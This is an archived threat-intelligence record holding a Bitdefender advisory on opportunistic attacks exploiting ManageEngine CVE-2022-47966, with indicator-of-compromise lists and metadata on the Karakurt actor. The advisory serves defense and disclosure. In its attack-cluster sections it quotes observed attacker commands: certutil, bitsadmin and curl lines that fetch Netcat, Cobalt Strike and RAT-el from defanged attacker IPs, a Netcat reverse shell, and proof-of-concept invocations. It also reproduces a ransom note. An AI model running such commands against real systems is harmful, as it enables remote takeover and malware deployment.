{ "id": "50b0f5d8-4334-4a6f-aefe-c4fd977687e8", "created_at": "2026-04-06T01:29:24.594229Z", "updated_at": "2026-04-10T03:25:35.798529Z", "deleted_at": null, "sha1_hash": "fddfe4b139190d30f8574b4b86a3bc0877310be5", "title": "Technical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 630087, "plain_text": "Technical Advisory: Various Threat Actors Targeting ManageEngine\r\nExploit CVE-2022-47966\r\nBy Martin Zugec\r\nPublished: 2023-02-23 · Archived: 2026-04-06 00:24:55 UTC\r\nStarting on January 20 2023,  Bitdefender Labs started to notice a global increase in attacks using the ManageEngine exploit\r\nCVE-2022-47966. This Remote Code Execution (RCE) vulnerability (CVSSv3 critical score 9.8) allows full takeover of the\r\ncompromised system by unauthenticated threat actors. A total of 24 different products from Zoho ManageEngine are\r\nvulnerable.\r\nWe started detecting first attacks immediately the next day after the first public Proof of Concept (PoC) was released and\r\ndocumented by Horizon3.ai team. The identified victims are located across the globe and are from various industries, as is\r\ncommon with opportunistic attacks. Based on our analysis, 2,000 to 4,000 servers accessible from the internet are running\r\none of the vulnerable versions. Not all servers are exploitable with the current PoC code, because SAML needs to be\r\nconfigured, but we urge all businesses running these vulnerable versions to patch immediately. After analyzing data from our\r\ntelemetry, we decided to release a technical advisory to warn the public about this latest wave of opportunistic attacks.\r\nFig 1 – Geographical distribution of attacks based on our analysis \r\nAfter recent attacks targeting Microsoft Exchange or ESXi servers, this is more proof that vulnerability exploits are\r\nbecoming routine for various groups of threat actors. Using data from our telemetry, we have identified different groups of\r\nthreat actors, including initial access brokers, ransomware groups, and cyber espionage experts.\r\nIn this technical advisory, we describe the latest trend of opportunistic attacks, explain this particular vulnerability, and\r\ndocument four different clusters of attacks we have analyzed. We urge all ManageEngine customers to immediately locate\r\nand patch all vulnerable systems and be on high alert, as attacks are not decreasing.\r\nThe “new” winning formula for threat actors\r\nThis latest wave of attacks are using similar a formula as we have observed previously with similar large-scale global\r\nattacks.\r\n1. Threat actors identify an RCE vulnerability (preferably with a public PoC example) that impacts as many companies\r\nas possible. Examples are Microsoft Exchange, Apache, or VMware ESXi. Due to the sheer scale of global\r\ndeployments, even if most companies patch immediately, tens of thousands of vulnerable servers are available even\r\nyears after patch is released. \r\n2. Using automated scanners, vulnerable systems are discovered and automatically compromised (spray-and-pray\r\ntactic).\r\n3. Malicious payload (typically a webshell to enable remote administration access) is deployed on compromised server.\r\nLess sophisticated attackers can automatically deploy ransomware – these are often disruptive and noisy campaigns that tend\r\nto get a lot of public attention (for example recent ESXiArgs ransomware). However,  the real danger comes from hybrid\r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 1 of 10\n\nattacks that combine automated compromise with more precise execution. Threat actors can patch the vulnerability\r\n(preventing their competitors from compromising the same system), perform assessment and decide what’s the best model\r\nof monetization. \r\nFig 2 – Flow of an example hybrid attack\r\nEven if majority of businesses patch quickly, threat actors are left with thousands of potential targets. These vulnerable\r\nservers often belong to smaller companies but can be used as a jump point for bigger and more lucrative targets. In many\r\ncases, your data (for stealing or encryption) are less valuable to threat actors than your business connections. When thinking\r\nof attack surface, we need to start including the whole supply chain, including small contractors and vendors. In this\r\nparticular case, several products for Managed Service Providers (MSPs) are impacted, further increasing the risk of supply\r\nchain attacks that can affect multiple businesses. \r\nAnother factor that helps threat actors is that initial exploits are often derivative and behave similarly to the original PoC\r\ncode with minimal modifications. This lack of initial diversity is affecting both offensive and defensive measures. The\r\nimpact of initial wave of attacks is mitigated, and temporary fixes and workarounds become permanent solutions. After the\r\nsituation calms down, threat actors can find alternative methods for exploitation and target systems that are considered\r\n“immune.” An example of this adaptation are recent ProxyNotShell/OWASSR attacks targeting Microsoft Exchange or\r\nvirtual machine escape for OpenSLP vulnerability. VulnCheck already documented a different payload for CVE-2022-47966\r\nvulnerability, with great explanation how the lack of diversity is becoming a significant problem when dealing with\r\nexploits. \r\nThe current state is beneficial for all types of threat actors – initial access brokers have time to establish better foothold and\r\noffer premium services (elevated privileges or victim information such as cyberinsurance coverage…), state-sponsored and\r\nprofit-sharing groups like Karakurt can exfiltrate data (read our deep dive into one of these operations), and more traditional\r\nRansomware-as-a-Service groups can prepare debilitating attacks at much bigger scale. \r\nConsidering all these factors, it is not surprising that our technical advisories in 2023 so far are based on vulnerabilities that\r\nwere routinely exploited in 2021. \r\nManageEngine Vulnerability Overview\r\nOn January 10, 2023, ManageEngine released a security advisory CVE-2022-47966 affecting 24 products. This vulnerability\r\nwas initially discovered by Khoa Dinh from VCSLab (read the original research). It allows unauthenticated remote code\r\nexecution due to usage of an outdated third-party dependency for XML signature validation, Apache Santuario. The\r\nvulnerability in this library was identified almost 15 years ago (March 2008). \r\nThe vulnerable library is used only when SAML SSO is/was enabled. SAML is over 20 years old authentication standard\r\nand authentication traffic is passed through the requesting client.\r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 2 of 10\n\nFix 3 – Normal SAML authentication flow\r\nThe modern authentication standards (like OpenID Connect) are not routing traffic through client, instead identity and\r\nservice provider are communicating directly, bypassing the client completely.  \r\nNormally, this should not be a concern. SAML is using XML format of data, and this data is digitally signed to prevent a\r\nclient from modifying it before it is passed over to the service provider. Unfortunately, with the older version of XML\r\nlibrary, the references validation is performed before the signature validation. \r\nFix 4 – with vulnerable library, references are validated before the signature validation \r\nWhen processing an XML file, threat actors can use XML transformations to execute malicious code. XML transformation\r\nis the process of changing the structure or format of an XML document to create a new XML document. The transformation\r\ncan be achieved by using a set of rules or instructions, known as an XSLT (eXtensible Stylesheet Language Transformation),\r\nwhich specifies how the source XML should be transformed into the target XML. Overall, XML transformation is a\r\npowerful tool that allows for the manipulation of XML data in a wide variety of ways – including execution of code. \r\nBefore service provider can validate the signature and identify that SAML response has been modified, the code is already\r\nexecuted on a compromised server. This code is executed under process \u003cinstall\r\ndirectory\u003e\\\\ManageEngine\\\\ServiceDesk\\\\jre\\\\bin\\\\java.exe.\r\nClusters of Attacks\r\nIn all analyzed cases, the aim of the attacks was to deploy tools on unpatched systems such as Netcat, Cobalt Strike beacon,\r\nRAT-el (open-source penetration testing tool) and others by using built-in tools like certutil.exe , bitsadmin.exe ,\r\npowershell.exe , or curl.exe . \r\nAmong the cases, we have identified four main clusters of attack types and information are provided in sections below.\r\nAside from these four clusters, we have identified a wide range of attacks that couldn’t be clustered. \r\nCluster 1 – Initial Access Brokers\r\nAfter initial compromise, the attack continued with the following commands: \r\nCommand Lines \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 3 of 10\n\ncertutil.exe -urlcache -f http://80.85.156[.]184:8085/cn.exe C:\\cn.exe  \r\npowershell C:\\cn.exe -e cmd.exe 80.85.156[.]184 443\r\nCN.exe was identified as a Netcat – command-line tool that is often used as a backdoor. Further analyzing our telemetry,\r\nwe have identified following files to be present on the same IP address and port. \r\nFile Name  MD5 Hash  Description \r\nAnyDesk.exe   9a1d9fe9b1223273c314632d04008384  Legitimate AnyDesk installer \r\ncf.exeb777226ef93acdb168980bbca82a48fe \r\nDarkComet communicating with\r\n80.85.156[.]184:1456\r\ncg.exe   8da896375e5d33e7d7486dbf71d008d8 \r\nDarkComet communicating with\r\n80.85.154[.]180:1456\r\ncl.exe5c0227204548c5a768c2e11da02ff774 \r\nDarkComet communicating with\r\n80.85.154[.]180:1456\r\ncn.exe   e0fb946c00b140693e3cf5de258c22a1  Netcat \r\nCVE-2022-\r\n47966.py\r\n6e3b1169aac82b4d0e8ea0a24d1477d5  PoC from Horizon3.ai \r\ngo.bate2c644343fad304ccde047f3301066ba \r\nrdp.ps19758c592ef4b9a2279f8e80e992248b6   Enable RDP on port 8094 \r\nreverse.elf199cb4936f7ef64fa134eb3cefff0518 \r\nReverse shell communicating with\r\n80.85.156[.]184  \r\nreverse.exe988038d8407d510c905183b8f6c421d6  \r\nReverse shell communicating with\r\n80.85.156[.]184  \r\nreverse_bind.exeedac597788e7c3df14a5fdcd13ee8916 \r\nThe threat actors used multiple scripts to automate their operation. These scripts ( ip\u003cnumber\u003e.sh ) used following syntax to\r\ntest if a target is vulnerable to CVE-2022-47966: \r\nCommand Lines \r\npython CVE-2022-47966.py --url https://\u003ctarget ip address\u003e:443/SamlResponseServlet --command 'powershell echo\r\nASDFGH \u003e C:\\Progra~1\\ManageEngine\\ServiceDesk\\webapps\\ROOT\\images\\a.txt' \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 4 of 10\n\npython CVE-2022-47966.py --url https://\u003ctarget ip address\u003e:8181/SamlResponseServlet --command 'powershell\r\necho ASDFGH \u003e C:\\Progra~1\\ManageEngine\\ServiceDesk\\webapps\\ROOT\\images\\a.txt'\r\nThe aim of these attacks was to install AnyDesk software for remote access.\r\nCluster 2 – Buhti Ransomware\r\nThe threat actors attempted to download any.bat to install AnyDesk software and tried to execute a ransomware payload\r\nfor Buhti Ransomware. This is a new ransomware family – while we have seen previous reports of Linux ransomware\r\nwritten in Go language, our sample was a Windows PE executable ( 383b0d0dda2d7557b5cca518f53256b9 ). \r\nThis ransomware sample is currently detected under name ATI:Ransom.Buhti.389227C4 . We have extracted the following\r\nransom note from the encryptor: \r\n----------- [ Welcome to buhtiRansom ] -------------\u003e  \r\n \r\nWhat happend?  \r\n----------------------------------------------  \r\nYour files are encrypted. We use strong encryption algorithms, so you cannot decrypt your data.  \r\nBut you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all\r\nyour files.  \r\nFollow our instructions below and you will recover all your data.  \r\n \r\nWhat guarantees?  \r\n----------------------------------------------  \r\nWe value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.  \r\nAll our decryption software is perfectly tested and will decrypt your data.  \r\n \r\nHow to get access?  \r\n----------------------------------------------  \r\nUsing a browser:  \r\n1) Open website: https://satoshidisk[.]com/pay/CHTWpW  \r\n2) Enter valid email to receive download link after payment.  \r\n3) Pay amount to Bitcoin address.  \r\n4) Receive email link to the download page.  \r\n5) Decrypt instruction included.  \r\n \r\n!!! DANGER !!!  \r\nDO NOT MODIFY or try to RECOVER any files yourself. It WILL NOT be able to RESTORE.  \r\n!!! DANGER !!! \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 5 of 10\n\nFig 5 – Screenshot of the payment site used by Buhti ransomware \r\nCluster 3 – Cobalt Strike and RAT-el\r\nThreat actors tried to download malicious software using bitsadmin.exe and curl.exe tools from 212.192.246[.]232\r\nserver. The analysis of the hosted files shows that Cobalt Strike and RAT-el red teaming tools were intended to be deployed. \r\nCommand Line  MD5  Description  Detection Name\r\n\"bitsadmin /transfer admin3 /download\r\n/priority high\r\nhttp://212.192.246[.]232/home/svchost.ps1\r\nC:\\\\users\\\\public\\\\music\\\\svchost.ps1\"\r\ne3cff253b9ad9050eb57d957624b796e\r\nCobalt Strike beacon with C2 \r\n0xx1.kaspenskyupdates[.]com\r\nHeur.BZC.Leop\r\nbitsadmin /transfer admin3 /download\r\n/priority high\r\nhttp://212.192.246[.]232/temp/conhost.exe\r\nC:\\\\users\\\\public\\\\music\\\\conhost.exe\r\n53deb494057bb8e5d72b0f53bab1cb44\r\nRAT-el communicates with C2\r\n135.181.121[.]232\r\nHeur.BZC.Leop\r\ncurl\r\nhttp://212.192.246[.]232/temp/conhost.exe\r\n-o c:\\\\windows\\\\temp\\\\conhost.exe\r\n53deb494057bb8e5d72b0f53bab1cb44Generic.Backd\r\nCluster 4 – Cyber espionage\r\nOne cluster included evidence of targeted espionage operation – we decided to write a separate, more detailed report about\r\nthis operation. You can read more about it in Weaponizing PoCs – A targeted attack using CVE-2022-47966 research from\r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 6 of 10\n\nBitdefender Labs. \r\nConclusion \u0026 Recommendations\r\nThis vulnerability is another clear reminder of the importance of keeping systems up to date with the latest security patches\r\nwhile also employing strong perimeter defense. Attackers don't need to scour for new exploits or novel techniques when\r\nthey know that many organizations are vulnerable to older exploits due, in part, to the lack of proper patch management and\r\nrisk management.  \r\nIn addition to prevention and cyber hygiene, multi-layered protection on all endpoints, servers, and workloads is critical. In\r\nour telemetry, we have identified the following indicators of compromise detected by different endpoint security modules: \r\nImplementing IP, domain, and URL reputation is one of the most effective methods of defeating automated vulnerability\r\nexploits. According to analysis in the Data Breach Investigations Report 2022, only 0.4% of the IPs that attempted RCE\r\nwere not seen in a previous attack. Blocking bad IPs, domains, or URLs on all devices, including remote and work-from-home endpoints, can be highly effective. \r\nFinally, companies of all sizes should implement detection and response capabilities to detect any suspicious activity on the\r\nnetwork and minimize the dwell time of adversaries. The GravityZone XDR sensors detect suspicious activity on the server\r\nor virtual machine, and alert security teams to lateral movement attempts or the establishment of an external connection by\r\nthe threat actor. This technology can be augmented by good security operations, either in-house or through a managed\r\nservice like Bitdefender MDR.  \r\nUltimately, it is important to keep in mind the best protection against modern cyber-attacks is a multi-layered defense-in-depth architecture. Bitdefender GravityZone covers this by delivering prevention, protection, and detection and response in a\r\nsingle solution. \r\nWe would like to thank Victor Vrabie, Cristina Vatamanu, and Alexandru Maximciuc for help with putting this advisory\r\nreport together.  \r\nCONTACT AN EXPERT\r\nIndicators of Compromise\r\nAn up-to-date and complete list of indicators of compromise is available to Bitdefender Threat Intelligence users. The\r\ncurrently known indicators of compromise can be found in the table below. \r\nURLs\r\nhttp://80.85.156[.]184:8085/cn.exe \r\nhttps://tmpfiles[.]org/dl/788858/any.txt \r\nhttps://tmpfiles[.]org/dl/765036/enc.txt \r\nhttp://212.192.246[.]232/home/svchost.ps1 \r\nhttp://212.192.246[.]232/temp/conhost.exe \r\nhttp://111.68.7[.]122:8081/svhost.exe \r\nhttp://146.70.126[.]178:57228/shell.exe \r\nhttp://185.163.45[.]86:8000/1.txt \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 7 of 10\n\nhttp://79.141.162[.]36:8888/aaaa.txt \r\nhttp://143.244.153[.]229:8090 \r\nhttp://160.20.147[.]145:8000/favicon.ico \r\nhttp://104.223.35[.]221/dashboard.html \r\nhttp://146.4.21[.]94/tmp/tmp/logs.php \r\nhttp://146.4.21[.]94/tmp/tmp/comp.dat \r\nhttp://45.146.7[.]20:8000/nc.exe \r\nhttp://149.28.57[.]130:443/Import.reg \r\nhttp://149.28.57[.]130:443/time.bat \r\nhttp://149.28.57[.]130:443/bdredline \r\nhttp://45.154.14[.]194:443/conhost.txt \r\nhttp://45.154.14[.]194:443/K7AVWScn.exe \r\nhttp://45.154.14[.]194:443/conhost.exe \r\nhttp://45.154.14[.]194:8080/conhost.exe \r\nhttp://45.154.14[.]194:443/K7AVWScn.pfx \r\nhttp://45.154.14[.]194:443/K7AVWScn.dll \r\nhttp://45.154.14[.]194:443/K7AVWScn.txt \r\nhttp://45.154.14[.]194:443/msftedit.dll \r\nhttp://45.154.14[.]194:443/OLE.PDB \r\nhttp://45.154.14[.]194:443/cmd.txt \r\nhttp://45.154.14[.]194:443/MainFilterInitializer.jar \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 8 of 10\n\nhttp://45.154.14[.]194:443/Import.reg \r\nhttp://45.154.14[.]194:443/time.bat \r\nFiles\r\nb777226ef93acdb168980bbca82a48fe \r\n8da896375e5d33e7d7486dbf71d008d8 \r\n5c0227204548c5a768c2e11da02ff774 \r\ne0fb946c00b140693e3cf5de258c22a1 \r\n9758c592ef4b9a2279f8e80e992248b6 \r\n199cb4936f7ef64fa134eb3cefff0518 \r\n988038d8407d510c905183b8f6c421d6 \r\nedac597788e7c3df14a5fdcd13ee8916 \r\n383b0d0dda2d7557b5cca518f53256b9 \r\ne3cff253b9ad9050eb57d957624b796e \r\n53deb494057bb8e5d72b0f53bab1cb44 \r\n527c71c523d275c8367b67bbebf48e9f \r\n61e82cae3c97887e4b367e507c4995ed \r\nc027d641c4c1e9d9ad048cda2af85db6 \r\n4960591cc04b080827020393f21c405b \r\nbfe79b11ee1b82ae95b14fd53b6c3fd3 \r\nIP Addresses\r\n45.154.14[.]194 \r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 9 of 10\n\n149.28.57[.]130 \r\n78.141.247[.]105 \r\n80.85.156[.]184 \r\n135.181.121[.]232 \r\n45.146.7[.]20 \r\n5.255.107[.]19 \r\n139.99.118[.]61 \r\n212.192.246[.]232 \r\n111.68.7[.]122 \r\n146.70.126[.]178 \r\n185.163.45[.]86 \r\n79.141.162[.]36 \r\n143.244.153[.]229 \r\n160.20.147[.]145 \r\n104.223.35[.]221 \r\n146.4.21[.]94 \r\nDomains\r\n0xx1.kaspenskyupdates[.]com \r\nicy51j1b6sbewpauivxwfrmcu30vok.oastify[.]com \r\nSource: https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nhttps://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966" ], "report_names": [ "tech-advisory-manageengine-cve-2022-47966" ], "threat_actors": [ { "id": "6ad410c7-e291-4327-a54b-281c23f0d4fa", "created_at": "2022-10-25T16:07:24.501468Z", "updated_at": "2026-04-10T02:00:05.013427Z", "deleted_at": null, "main_name": "Karakurt", "aliases": [ "Mushy Scorpius" ], "source_name": "ETDA:Karakurt", "tools": [ "7-Zip", "Agentemis", "AnyDesk", "Cobalt Strike", "CobaltStrike", "FileZilla", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "WinZip", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "2af9bea3-b43e-4a6d-8dc6-46dad6e3ff24", "created_at": "2022-10-25T16:47:55.853415Z", "updated_at": "2026-04-10T02:00:03.856263Z", "deleted_at": null, "main_name": "GOLD TOMAHAWK", "aliases": [ "Karakurt", "Karakurt Lair", "Karakurt Team" ], "source_name": "Secureworks:GOLD TOMAHAWK", "tools": [ "7-Zip", "AnyDesk", "Mega", "QuickPacket", "Rclone", "SendGB" ], "source_id": "Secureworks", "reports": null }, { "id": "079e3d6e-24ef-42b0-b555-75c288f9efd8", "created_at": "2023-03-04T02:01:54.105946Z", "updated_at": "2026-04-10T02:00:03.359009Z", "deleted_at": null, "main_name": "Karakurt", "aliases": [ "Karakurt Lair" ], "source_name": "MISPGALAXY:Karakurt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775438964, "ts_updated_at": 1775791535, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.pdf", "text": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.txt", "img": "https://archive.orkl.eu/fddfe4b139190d30f8574b4b86a3bc0877310be5.jpg" } }